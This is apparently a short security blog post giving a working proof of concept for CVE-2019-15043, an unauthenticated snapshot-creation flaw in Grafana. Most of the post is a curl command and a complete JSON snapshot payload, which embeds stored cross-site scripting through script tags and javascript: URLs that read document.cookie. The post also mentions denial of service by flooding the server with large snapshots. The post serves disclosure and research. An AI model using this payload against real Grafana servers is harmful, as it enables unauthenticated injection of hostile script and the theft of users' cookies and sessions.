Exploit Grafana (CVE‑2019‑15043)

• 2019年12月
• security,
• poc

Grafana is a monitoring dashboard used to display metrics. It's used by many infrastructure and development teams.

This CVE (not found by me) allows:

• creation of snapshots without authentication
• DoS of server by posting many large snapshots
• XSS: access grafana API
• XSS: maybe access non-HttpOnly cookies from other subdomains

PoC #

curl -ik https://GRAFANA/api/snapshots/ \
  -H 'Content-Type: application/json' \
  --data @snapshotrequest.json

where snapshotrequest.json for v4.4.3 contains something like:

{
    "dashboard": {
        "annotations": {
            "list": []
        },
        "editable": true,
        "graphTooltip": 1,
        "hideControls": false,
        "id": null,
        "links": [
            {
                "icon": "question",
                "tags": [],
                "title": "Hello Hello Hello Hello Hello Hello Hello Hello Hello Hello Hello Hello... repeated many times to make the screen fill up and cause the tooltip to be triggered",
                "tooltip": "Hello <u>there</u><script>alert('tooltip says ' + document.cookie)</script>",
                "type": "link",
                "url": "javascript:alert('3'+document.cookie)"
            }
        ],
        "refresh": "5s",
        "rows": [
            {
                "height": "500px",
                "panels": [
                    {
                        "content": "Hello <script>alert('panel says ' + document.cookie)</script>",
                        "datasource": null,
                        "description": "Description",
                        "id": 1,
                        "links": [],
                        "mode": "html",
                        "span": 12,
                        "targets": [],
                        "title": "Panel",
                        "type": "text"
                    }
                ],
                "span": 12
            }
        ],
        "schemaVersion": 17,
        "snapshot": {
            "external": true,
            "originalUrl": "javascript:alert('4'+document.cookie)"
        },
        "style": "dark",
        "tags": [],
        "templating": {
            "list": []
        },
        "time": {
            "from": "now-6h",
            "to": "now"
        },
        "timepicker": {
            "refresh_intervals": [],
            "time_options": []
        },
        "timezone": "browser",
        "title": "This is a snapshot",
        "uid": "abcdef",
        "version": 0
    }
}

The response will be e.g.:

{
    "deleteKey": "bUT3gkzSCrsrGZScAbW1IM0RX4QUPXj0",
    "deleteUrl": "/api/snapshots-delete/bUT3gkzSCrsrGZScAbW1IM0RX4QUPXj0",
    "key": "5aCDFUkwwukLbIb2Ij516DnfBaPqmOdz",
    "url": "/dashboard/snapshot/5aCDFUkwwukLbIb2Ij516DnfBaPqmOdz"
}

and the dashboard is available at url or in the list at /dashboard/snapshots.

The stored XSS is triggered:

• on page load (by using an html panel, normal functionality)
• on hovering over the "Hello Hello Hello..." (relying on CVE-2018-12099)

References #

• Grafana blog for Important Security Fix
• Github fix

• Previous: Two REDoS vulns in cpython
• Next: Jenkins UDP ping-pong (CVE‑2020‑2100)